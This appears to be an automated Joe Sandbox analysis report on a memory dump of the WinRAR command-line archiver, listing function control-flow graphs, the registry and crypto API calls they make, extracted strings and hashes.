                                                                                                                                                                                                                                            control_flow_graph 1405 7ff702c14fd0-7ff702c1502d call 7ff702c5a5a0 1408 7ff702c1504d-7ff702c15055 1405->1408 1409 7ff702c1502f-7ff702c15037 1405->1409 1411 7ff702c15057-7ff702c15069 call 7ff702c1481c 1408->1411 1412 7ff702c1506e-7ff702c15089 call 7ff702c3420c 1408->1412 1409->1408 1410 7ff702c15039-7ff702c1504b call 7ff702c5c8a0 1409->1410 1410->1408 1410->1411 1411->1412 1418 7ff702c1508b-7ff702c1509d call 7ff702c4a9c0 1412->1418 1419 7ff702c1509f-7ff702c150b6 call 7ff702c4db08 1412->1419 1425 7ff702c1511b-7ff702c15131 call 7ff702c5c8a0 1418->1425 1424 7ff702c150b8-7ff702c150c3 call 7ff702c4a59c 1419->1424 1419->1425 1424->1425 1432 7ff702c150c5-7ff702c150cf call 7ff702c23054 1424->1432 1430 7ff702c15137-7ff702c1513e 1425->1430 1431 7ff702c15203-7ff702c1520d call 7ff702c4aa48 1425->1431 1433 7ff702c1516c-7ff702c151be call 7ff702c4aa1c call 7ff702c4aa48 call 7ff702c46e98 1430->1433 1434 7ff702c15140-7ff702c15167 call 7ff702c33f98 1430->1434 1440 7ff702c15212-7ff702c1521c 1431->1440 1432->1425 1441 7ff702c150d1-7ff702c15107 call 7ff702c4a9e8 call 7ff702c4a9c0 call 7ff702c23054 1432->1441 1497 7ff702c151d3-7ff702c151e8 call 7ff702c47a24 1433->1497 1434->1433 1443 7ff702c152db-7ff702c152e0 1440->1443 1444 7ff702c15222 1440->1444 1441->1425 1521 7ff702c15109-7ff702c15116 call 7ff702c4a9e8 1441->1521 1445 7ff702c15453-7ff702c15477 call 7ff702c1f00c call 7ff702c1f230 call 7ff702c1f09c 1443->1445 1446 7ff702c152e6-7ff702c152e9 1443->1446 1449 7ff702c15228-7ff702c1522d 1444->1449 1450 7ff702c1532f-7ff702c15332 1444->1450 1499 7ff702c1547c-7ff702c15483 1445->1499 1454 7ff702c15379-7ff702c15382 1446->1454 1455 7ff702c152ef-7ff702c152f2 1446->1455 1449->1450 1458 7ff702c15233-7ff702c15236 1449->1458 1452 7ff702c1533b-7ff702c1533e 1450->1452 1453 7ff702c15334 1450->1453 1462 7ff702c15347-7ff702c15358 call 7ff702c01230 call 7ff702c04858 1452->1462 1463 7ff702c15340 1452->1463 1453->1452 1460 7ff702c15388-7ff702c1538b 1454->1460 1461 7ff702c15449-7ff702c15451 call 7ff702c3eab8 1454->1461 1464 7ff702c1536c-7ff702c15374 call 7ff702c481cc 1455->1464 1465 7ff702c152f4-7ff702c152f7 1455->1465 1468 7ff702c15238-7ff702c1523b 1458->1468 1469 7ff702c15290-7ff702c15299 1458->1469 1472 7ff702c1541b-7ff702c15433 call 7ff702c4ab1c 1460->1472 1473 7ff702c15391-7ff702c15397 1460->1473 1461->1499 1529 7ff702c1535d 1462->1529 1463->1462 1464->1499 1465->1445 1475 7ff702c152fd-7ff702c15300 1465->1475 1480 7ff702c1523d-7ff702c15240 1468->1480 1481 7ff702c15274-7ff702c1528b call 7ff702c01230 call 7ff702c048ec 1468->1481 1477 7ff702c1529b-7ff702c1529e 1469->1477 1478 7ff702c152b2-7ff702c152bd 1469->1478 1472->1499 1528 7ff702c15435-7ff702c15447 call 7ff702c3bbd4 1472->1528 1488 7ff702c15399-7ff702c1539c 1473->1488 1489 7ff702c1540c-7ff702c15419 call 7ff702c354f8 call 7ff702c351e4 1473->1489 1475->1450 1490 7ff702c15302-7ff702c15305 1475->1490 1483 7ff702c152ce-7ff702c152d6 call 7ff702c355e0 1477->1483 1496 7ff702c152a0-7ff702c152a6 1477->1496 1478->1483 1484 7ff702c152bf-7ff702c152c9 call 7ff702c4a9e8 1478->1484 1480->1445 1492 7ff702c15246-7ff702c15249 1480->1492 1545 7ff702c1535e-7ff702c15362 call 7ff702c014fc 1481->1545 1483->1499 1484->1483 1502 7ff702c1539e-7ff702c153a1 1488->1502 1503 7ff702c153ef-7ff702c15401 call 7ff702c145c8 1488->1503 1489->1499 1504 7ff702c15307-7ff702c1530a 1490->1504 1505 7ff702c15322-7ff702c1532a call 7ff702c267e0 1490->1505 1492->1450 1507 7ff702c1524f-7ff702c15252 1492->1507 1512 7ff702c152a8-7ff702c152ad call 7ff702c17214 1496->1512 1513 7ff702c15313-7ff702c1531d call 7ff702c1481c 1496->1513 1531 7ff702c151ea-7ff702c15201 call 7ff702c46f68 call 7ff702c014c0 1497->1531 1532 7ff702c151c0-7ff702c151ce call 7ff702c4aa48 1497->1532 1518 7ff702c15491-7ff702c154bc call 7ff702c5a610 1499->1518 1519 7ff702c15485-7ff702c1548c call 7ff702c18444 1499->1519 1502->1513 1517 7ff702c153a7-7ff702c153d5 call 7ff702c145c8 call 7ff702c4ab1c 1502->1517 1503->1489 1504->1445 1520 7ff702c15310 1504->1520 1505->1499 1507->1445 1524 7ff702c15258-7ff702c1525b 1507->1524 1512->1499 1513->1499 1517->1499 1561 7ff702c153db-7ff702c153ea call 7ff702c3ba9c 1517->1561 1519->1518 1520->1513 1521->1425 1539 7ff702c1526b-7ff702c15272 1524->1539 1540 7ff702c1525d-7ff702c15260 1524->1540 1528->1499 1529->1545 1531->1440 1532->1497 1539->1483 1540->1505 1550 7ff702c15266 1540->1550 1557 7ff702c15367 1545->1557 1550->1520 1557->1499 1561->1499
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: wcschr
                                                                                                                                                                                                                                            • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                                                                                            • API String ID: 1497570035-1281034975
                                                                                                                                                                                                                                            • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                            • Instruction ID: ac5b42b42ac7ec7120651e4e3ebe7e5b3e9bc8e162e53abae3775508712fdb21
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35C15163B18682A4EB25BA25CC521FF9A51AF877C4FC44131DA4E5A7DADFECE501C320
                                                                                                                                                                                                                                            Function 00007FF702C47F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 1564 7ff702c47f24-7ff702c47f5c 1565 7ff702c47f5e-7ff702c47f64 1564->1565 1566 7ff702c47fd0 1564->1566 1565->1566 1568 7ff702c47f66-7ff702c47f7c call 7ff702c4b3f0 1565->1568 1567 7ff702c47fd7-7ff702c47fea 1566->1567 1569 7ff702c47fec-7ff702c47fef 1567->1569 1570 7ff702c48036-7ff702c48039 1567->1570 1576 7ff702c47f7e-7ff702c47fb3 GetProcAddressForCaller GetProcAddress 1568->1576 1577 7ff702c47fb5 1568->1577 1573 7ff702c4805c-7ff702c48065 GetCurrentProcessId 1569->1573 1575 7ff702c47ff1-7ff702c48000 1569->1575 1570->1573 1574 7ff702c4803b-7ff702c4804a 1570->1574 1578 7ff702c48077-7ff702c48093 1573->1578 1579 7ff702c48067 1573->1579 1584 7ff702c4804f-7ff702c48051 1574->1584 1585 7ff702c48005-7ff702c48007 1575->1585 1580 7ff702c47fbc-7ff702c47fce 1576->1580 1577->1580 1583 7ff702c48069-7ff702c48075 1579->1583 1580->1567 1583->1578 1583->1583 1584->1578 1586 7ff702c48053-7ff702c4805a 1584->1586 1585->1578 1587 7ff702c48009 1585->1587 1588 7ff702c48010-7ff702c48034 call 7ff702c1ca6c call 7ff702c1cda4 call 7ff702c1ca40 1586->1588 1587->1588 1588->1578
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                                                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                            • API String ID: 1389829785-2207617598
                                                                                                                                                                                                                                            • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                            • Instruction ID: d58bd4db819258c19524c58b128c39a932f8a06a6917b4c12257925e2cf53f16
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF415B26A08A92A1EB45FB12AC04537EFA2AF45BD4F980631DC2D07794DFFDE446C360
                                                                                                                                                                                                                                            Function 00007FF702C5B0FC Relevance: 13.6, APIs: 9, Instructions: 92COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 552178382-0
                                                                                                                                                                                                                                            • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                            • Instruction ID: 12b608eeb27ed9d81eee662cb967363212fb412013df4d3ea008f1682f0340be
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3314C23A0856361EB54BB259C153BBEF91AF45788FC40434EA0D4729BDFACE884C371
                                                                                                                                                                                                                                            Function 00007FF702C44774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF702C4495D,?,?,?,00007FF702C37E7D), ref: 00007FF702C447DB
                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF702C4495D,?,?,?,00007FF702C37E7D), ref: 00007FF702C44831
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF702C4495D,?,?,?,00007FF702C37E7D), ref: 00007FF702C44853
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF702C4495D,?,?,?,00007FF702C37E7D), ref: 00007FF702C448A6
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                                                                                            • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                                                                                            • API String ID: 1800380464-3408810217
                                                                                                                                                                                                                                            • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                            • Instruction ID: 2423bb8c01f9b26fb8d906c710766e1209eab9ec44755b28ef72c256e74c43bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1319223718A8165EB60EB21EC106BBAB51FF847A4F805231EE4D47B99EFECD144C710
                                                                                                                                                                                                                                            Function 00007FF702C34398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C343D1
                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C34402
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C3440D
                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C3443E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                                            • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                                            • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                                            • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                            • Instruction ID: e156cecf612dc6333a1e6e48b2e1476daa09418f1d7f95ea6d9027f4af576c23
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E112E23A18742A6EB21BF26AC005AABB60FF84BD4F845531EA4E07755DFBCD544C760
                                                                                                                                                                                                                                            Function 00007FF702C07A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 1715 7ff702c07a5b-7ff702c07a5e 1716 7ff702c07a60-7ff702c07a66 1715->1716 1717 7ff702c07a68 1715->1717 1716->1717 1718 7ff702c07a6b-7ff702c07a7c 1716->1718 1717->1718 1719 7ff702c07a7e-7ff702c07a81 1718->1719 1720 7ff702c07aa8 1718->1720 1722 7ff702c07a83-7ff702c07a86 1719->1722 1723 7ff702c07a88-7ff702c07a8b 1719->1723 1721 7ff702c07aab-7ff702c07ab8 1720->1721 1724 7ff702c07aba-7ff702c07abd 1721->1724 1725 7ff702c07ac8-7ff702c07acb 1721->1725 1722->1720 1722->1723 1726 7ff702c07aa4-7ff702c07aa6 1723->1726 1727 7ff702c07a8d-7ff702c07a90 1723->1727 1724->1725 1728 7ff702c07abf-7ff702c07ac6 1724->1728 1729 7ff702c07acf-7ff702c07ad1 1725->1729 1726->1721 1727->1720 1730 7ff702c07a92-7ff702c07a99 1727->1730 1728->1729 1731 7ff702c07ad3-7ff702c07ae6 1729->1731 1732 7ff702c07b2a-7ff702c07bb0 call 7ff702c21d34 call 7ff702c03f04 1729->1732 1730->1726 1733 7ff702c07a9b-7ff702c07aa2 1730->1733 1734 7ff702c07b0a-7ff702c07b27 1731->1734 1735 7ff702c07ae8-7ff702c07af2 call 7ff702c19be0 1731->1735 1744 7ff702c07bb2-7ff702c07bba 1732->1744 1745 7ff702c07bbc 1732->1745 1733->1720 1733->1726 1734->1732 1739 7ff702c07af7-7ff702c07b02 1735->1739 1739->1734 1744->1745 1746 7ff702c07bbf-7ff702c07bc9 1744->1746 1745->1746 1747 7ff702c07bcb-7ff702c07bd5 call 7ff702c21e1c 1746->1747 1748 7ff702c07bda-7ff702c07c06 call 7ff702c0b540 1746->1748 1747->1748 1752 7ff702c07c40 1748->1752 1753 7ff702c07c08-7ff702c07c0f 1748->1753 1754 7ff702c07c44-7ff702c07c5a call 7ff702c0aa68 1752->1754 1753->1752 1755 7ff702c07c11-7ff702c07c14 1753->1755 1760 7ff702c07c85-7ff702c07c97 call 7ff702c0b540 1754->1760 1761 7ff702c07c5c-7ff702c07c6a 1754->1761 1755->1752 1757 7ff702c07c16-7ff702c07c2b 1755->1757 1757->1754 1759 7ff702c07c2d-7ff702c07c3e call 7ff702c59b98 1757->1759 1759->1754 1767 7ff702c07c9c-7ff702c07c9f 1760->1767 1761->1760 1763 7ff702c07c6c-7ff702c07c7e call 7ff702c08d98 1761->1763 1763->1760 1769 7ff702c07ca5-7ff702c07cfb call 7ff702c39354 call 7ff702c26378 * 2 1767->1769 1770 7ff702c07fa4-7ff702c07fbe 1767->1770 1777 7ff702c07cfd-7ff702c07d10 call 7ff702c05414 1769->1777 1778 7ff702c07d17-7ff702c07d1f 1769->1778 1777->1778 1780 7ff702c07d25-7ff702c07d28 1778->1780 1781 7ff702c07de2-7ff702c07de6 1778->1781 1780->1781 1785 7ff702c07d2e-7ff702c07d36 1780->1785 1783 7ff702c07e4e-7ff702c07e68 call 7ff702c39958 1781->1783 1784 7ff702c07de8-7ff702c07e49 call 7ff702c398dc 1781->1784 1794 7ff702c07e8b-7ff702c07e8e 1783->1794 1795 7ff702c07e6a-7ff702c07e84 1783->1795 1784->1783 1788 7ff702c07d59-7ff702c07d6a call 7ff702c5a444 1785->1788 1789 7ff702c07d38-7ff702c07d49 call 7ff702c5a444 1785->1789 1797 7ff702c07d6c-7ff702c07d77 call 7ff702c2cf8c 1788->1797 1798 7ff702c07d78-7ff702c07dc6 1788->1798 1801 7ff702c07d4b-7ff702c07d56 call 7ff702c28ae8 1789->1801 1802 7ff702c07d57 1789->1802 1799 7ff702c07e90-7ff702c07e9a call 7ff702c39990 1794->1799 1800 7ff702c07e9f-7ff702c07eb8 call 7ff702c01204 1794->1800 1795->1794 1797->1798 1798->1781 1823 7ff702c07dc8-7ff702c07de1 call 7ff702c01314 call 7ff702c5ba34 1798->1823 1799->1800 1812 7ff702c07ec8-7ff702c07ed9 call 7ff702c3941c 1800->1812 1801->1802 1802->1798 1817 7ff702c07edb-7ff702c07f9f call 7ff702c01400 call 7ff702c26424 call 7ff702c0b540 1812->1817 1818 7ff702c07eba-7ff702c07ec3 call 7ff702c39680 1812->1818 1817->1770 1818->1812 1823->1781
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: H9
                                                                                                                                                                                                                                            • API String ID: 0-2207570329
                                                                                                                                                                                                                                            • Opcode ID: 19b84a5dc8f1e1731eb20c15cd5d03a2218ffa5299a76aab5d0559900d89bcd1
                                                                                                                                                                                                                                            • Instruction ID: e76733f4aa280140a86d2c8344a88ba825ee2bdc4d678ca012405aff91a138d8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19b84a5dc8f1e1731eb20c15cd5d03a2218ffa5299a76aab5d0559900d89bcd1
